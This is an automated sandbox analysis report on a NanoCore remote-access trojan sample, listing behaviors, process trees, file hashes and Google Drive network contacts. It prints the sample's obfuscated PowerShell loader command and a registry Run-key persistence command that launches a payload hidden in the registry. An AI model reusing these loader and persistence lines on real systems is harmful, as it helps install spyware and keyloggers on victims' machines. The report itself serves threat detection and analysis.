Malware Analysis Report

2024-08-06 15:23

Sample ID 240517-y5jdfahc31
Target 2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe
SHA256 01084cac1b32ed96f39659685faaf1f37cfaee0d204a361c3759c3ff0aa38389
Tags nanocore execution keylogger persistence spyware stealer trojan
Score 10/10

Analysis Overview

score
10/10

SHA256

01084cac1b32ed96f39659685faaf1f37cfaee0d204a361c3759c3ff0aa38389

Threat Level: Known bad

The file 2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

nanocore execution keylogger persistence spyware stealer trojan

NanoCore

Command and Scripting Interpreter: PowerShell

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Program crash

NSIS installer

Creates scheduled task(s)

Modifies registry key

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-05-17 20:22

Signatures

NSIS installer

installer

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-17 20:22

Reported

2024-05-17 20:24

Platform

win7-20240508-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe"

Signatures

NanoCore

keylogger trojan stealer spyware nanocore

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\Fremfrings = "%Taletiden% -windowstyle minimized $Typecasts=(Get-ItemProperty -Path 'HKCU:\\Crepidoma\\').Fozinesses;%Taletiden% ($Typecasts)" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\NTFS Monitor = "C:\\Program Files (x86)\\NTFS Monitor\\ntfsmon.exe" C:\Program Files (x86)\windows mail\wab.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1648 set thread context of 2068 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\NTFS Monitor\ntfsmon.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\Program Files (x86)\NTFS Monitor\ntfsmon.exe C:\Program Files (x86)\windows mail\wab.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Vulnerabilities\Navettes131.ini C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\resources\0409\sporeforming.bal C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\resources\stereotypery.teu C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2228 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1648 wrote to memory of 356 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1648 wrote to memory of 2068 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2068 wrote to memory of 2152 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2152 wrote to memory of 768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2068 wrote to memory of 1100 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\schtasks.exe
PID 2068 wrote to memory of 2296 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -windowstyle hidden "$Afspadserede225=Get-Content 'C:\Users\Admin\AppData\Local\Temp\Mediatrices238\udkikstaarnene\deflationer\Elverhj\Forskrivende.Udr';$Novelettish=$Afspadserede225.SubString(53200,3);.$Novelettish($Afspadserede225)"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Fremfrings" /t REG_EXPAND_SZ /d "%Taletiden% -windowstyle minimized $Typecasts=(Get-ItemProperty -Path 'HKCU:\Crepidoma\').Fozinesses;%Taletiden% ($Typecasts)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Fremfrings" /t REG_EXPAND_SZ /d "%Taletiden% -windowstyle minimized $Typecasts=(Get-ItemProperty -Path 'HKCU:\Crepidoma\').Fozinesses;%Taletiden% ($Typecasts)"

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /f /tn "NTFS Monitor" /xml "C:\Users\Admin\AppData\Local\Temp\tmp99A3.tmp"

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /f /tn "NTFS Monitor Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp9A20.tmp"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Mediatrices238\udkikstaarnene\deflationer\Elverhj\Forskrivende.Udr

MD5 6b3ce49e30626debe4ebc638e79bfbc1
SHA1 f0941c7b2694735091249b1676e4ba7693e6ede9
SHA256 bebd427c3ece459de5fc091d4573f313ba55bf68bdad2dbaf9f8ec5637b4990e
SHA512 d1bd3fb17897cba3fa4e9bde3b7bc7b73c88edb72cb47bc439b866c45f77ae85d01c6d9941ebc574ef660c33395b804a441bf9cef370b0c5dedbd3a1ac604e5d

C:\Users\Admin\AppData\Local\Temp\Mediatrices238\udkikstaarnene\deflationer\Milieugifts.Koa

MD5 c1db703a47e0df7927aed1ab569b7ba7
SHA1 9b13decd58b8c434974ec24141b29e07ad008297
SHA256 7956dcaf28392b383184aec8e81c6c2f0b8d6c12fb889360c1a8f51a85912fb5
SHA512 b920cb5d9663eb3372a2c112b439dd83deb438d432b61bec63e697ae66d2131f169d18592e9e8c5213ee3f591bad8fa1b724915cd4f01d0d45c79070ae6d7977

C:\Users\Admin\AppData\Local\Temp\tmp99A3.tmp

MD5 5ccc18c3f1852b87de26278cba055c13
SHA1 9233db8c004ac3e1b34c0782bac706a17bdc43ae
SHA256 7d588a9e361cccb0a3c97ec7ac99efe60e82932c64ab6efbfc929f51acb38432
SHA512 1ad0e9d090e93bdfa76c7ff60c5492c43265f53adf0ac23a7c831231e12822b11bae6d0840f92c8deddc9e08dbb383d24073ece791feaf36687692a437294ed7

C:\Users\Admin\AppData\Local\Temp\tmp9A20.tmp

MD5 981e126601526eaa5b0ad45c496c4465
SHA1 d610d6a21a8420cc73fcd3e54ddae75a5897b28b
SHA256 11ae277dfa39e7038b782ca6557339e7fe88533fe83705c356a1500a1402d527
SHA512 a59fb704d931ccb7e1ec1a7b98e24ccd8708be529066c6de4b673098cdebef539f7f50d9e051c43954b5a8e7f810862b3a4ede170f131e080dadc3e763ed4bdb

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-17 20:22

Reported

2024-05-17 20:24

Platform

win10v2004-20240426-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Vulnerabilities\Navettes131.ini C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\resources\0409\sporeforming.bal C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\resources\stereotypery.teu C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\2b0539ba691f98b1c255d082d7589570_NeikiAnalytics.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -windowstyle hidden "$Afspadserede225=Get-Content 'C:\Users\Admin\AppData\Local\Temp\Mediatrices238\udkikstaarnene\deflationer\Elverhj\Forskrivende.Udr';$Novelettish=$Afspadserede225.SubString(53200,3);.$Novelettish($Afspadserede225)"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2208 -ip 2208

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 2548

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ljnm0o24.dou.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\Mediatrices238\udkikstaarnene\deflationer\Elverhj\Forskrivende.Udr

MD5 6b3ce49e30626debe4ebc638e79bfbc1
SHA1 f0941c7b2694735091249b1676e4ba7693e6ede9
SHA256 bebd427c3ece459de5fc091d4573f313ba55bf68bdad2dbaf9f8ec5637b4990e
SHA512 d1bd3fb17897cba3fa4e9bde3b7bc7b73c88edb72cb47bc439b866c45f77ae85d01c6d9941ebc574ef660c33395b804a441bf9cef370b0c5dedbd3a1ac604e5d